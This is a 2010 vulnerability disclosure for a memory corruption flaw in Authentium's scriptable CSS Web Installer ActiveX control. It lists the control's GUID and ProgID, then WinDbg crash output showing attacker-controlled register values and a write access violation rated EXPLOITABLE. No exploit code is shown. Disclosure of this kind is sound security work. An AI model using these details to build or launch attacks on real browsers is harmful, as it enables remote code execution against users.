Authentium Command Free Scan ActiveX Control Memory corruption Exploit
Author:   Nikolas Sotiriu (lofi)
Advisory: http://www.sotiriu.de/adv/NSOADV-2010-xxx.txt

Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.




ActiveX Control Informations:
Name:			CSS Web Installer Class
Prog ID:		CSSWEBLib.Installer
Vendor:			Authentium, Inc.
Type:             	ActiveX-Control
Version:          	1.4.9508.605
GUID:             	{6CCE3920-3183-4B3D-808A-B12EB769DE12}
File:             	cssweb.dll
Folder:			C:\WINDOWS\Downloaded Program Files\
Safe for Script: 	True
Safe for Init: 		True
IObjectSafety: 		False

Test Informations:
- Windows XP SP3 IE7 Ger

M$ Exploitablitiy Informations

(158.968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7efefefe ebx=02695140 ecx=02695180 edx=41414141 esi=02695140 edi=42424242
eip=1000c1a9 esp=0194b414 ebp=0194b4e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\Downloaded Program Files\cssweb.dll - 
cssweb!DllUnregisterServer+0x37a3:
1000c1a9 8917            mov     dword ptr [edi],edx  ds:0023:42424242=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:005> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x42424242
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x223e0447.0x22676030

Stack Trace:
cssweb!DllUnregisterServer+0x37a3
cssweb!DllUnregisterServer+0x22d8
mshtml!CFontCache::GetBaseCcs+0x1bd
mshtml!CStr::Set+0x1b
mshtml!COneRun::Clone+0x87
Instruction Address: 0x000000001000c1a9

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at cssweb!DllUnregisterServer+0x00000000000037a3 (Hash=0x223e0447.0x22676030)

User mode write access violations that are not near NULL are exploitable.